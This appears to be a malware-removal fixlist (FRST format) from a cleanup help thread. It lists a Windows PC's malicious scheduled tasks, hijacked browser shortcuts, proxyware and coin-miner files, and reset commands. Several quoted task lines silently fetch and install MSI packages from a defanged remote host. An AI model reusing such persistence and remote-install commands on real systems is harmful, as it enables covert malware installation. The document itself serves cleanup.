Task: {9BC3B939-3C84-4CDF-94C9-1B0D0591DC87} - System32\Tasks\Microsoft\Windows\DeviceSettings\Puperpysikuy => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&d=20170530 /q <==== ATTENTION
Task: {B1634AE3-FE78-4284-A8D8-3EF65484757E} - System32\Tasks\Bjuchsupoent Community => msiexec.exe /i hxxp://D2Buh1bF1G584W.CLouDfRoNT.net/mmtsk/occup.php?p=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&d=20170407 /q <==== ATTENTION
Task: {B2253CB4-301D-4EDF-B5ED-6F03B9182541} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-27] () <==== ATTENTION
C:\Program Files (x86)\MIO
Task: {E882D6F8-9F53-49CD-8EA1-AF01F04F8F4F} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {F4B09842-A251-4FA9-8824-A11C54AD00D9} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\User\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Bagsarah\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\User\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
2017-05-30 19:00 - 2017-05-30 19:00 - 00307200 _____ () C:\Windows\TEMP\g4ED2.tmp.exe
2017-05-30 19:01 - 2017-05-30 19:01 - 00476672 _____ () C:\Windows\TEMP\gDA0.tmp.exe
2017-02-03 15:27 - 2017-02-03 15:27 - 00289792 ____H () C:\Program Files (x86)\Bekserikut Log\local64spl.dll
2017-05-30 18:16 - 2017-05-30 18:17 - 00007680 _____ () C:\Users\User\AppData\Roaming\qsbmbhsyi5n\jrtmlrcem5k.exe
2017-05-30 19:27 - 2017-05-30 19:27 - 00144896 _____ () C:\Users\User\AppData\Roaming\Minerent\Wuteghtplejipy.dll
2017-05-30 18:17 - 2017-05-30 18:17 - 00007680 _____ () C:\Users\User\AppData\Roaming\fdgsooj4hcw\00vihxx214b.exe
2017-05-30 18:46 - 2017-05-30 18:46 - 00007680 _____ () C:\Users\User\AppData\Roaming\wofdlyh3mtz\jub1mo14lha.exe
2017-05-30 18:47 - 2017-05-30 18:47 - 00007680 _____ () C:\Users\User\AppData\Roaming\rwheqpsdj5s\ysfsny2kt1i.exe
2017-05-30 18:47 - 2017-05-30 18:47 - 00007680 _____ () C:\Users\User\AppData\Roaming\rgj4geoi4kx\4ofrchtpykc.exe
2017-05-30 19:14 - 2017-05-30 19:14 - 00007680 _____ () C:\Users\User\AppData\Roaming\5k4r2bbnlq1\jt401bjv5lg.exe
2017-05-30 19:17 - 2017-05-30 19:17 - 00007680 _____ () C:\Users\User\AppData\Roaming\etexyvrgmh4\jatr0sdxxuh.exe
2017-05-30 19:17 - 2017-05-30 19:17 - 00007680 _____ () C:\Users\User\AppData\Roaming\0awgowyo0ms\0nhwku5oyj2.exe
2017-05-30 22:41 - 2017-05-30 22:41 - 00007680 _____ () C:\Users\User\AppData\Roaming\ws35pv4otzu\exrir35so13.exe
2017-05-30 19:27 - 2017-05-30 19:27 - 00007680 _____ () C:\Users\User\AppData\Roaming\aesf43dd52u\r23xflwmacl.exe
2017-05-30 18:24 - 2017-05-30 18:25 - 01468261 _____ () C:\Users\User\AppData\Roaming\isMiner\gw64-core2.exe
2017-05-30 19:27 - 2017-05-30 19:27 - 00007680 _____ () C:\Users\User\AppData\Roaming\u5cbuyosxxt\221tqfnete3.exe
2017-05-30 22:42 - 2017-05-30 22:42 - 00007680 _____ () C:\Users\User\AppData\Roaming\1nuxxy02ibu\cjuwkzecetj.exe
2017-05-30 22:42 - 2017-05-30 22:42 - 00007680 _____ () C:\Users\User\AppData\Roaming\ocaxkzchr0f\0y51erqgzkl.exe
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp: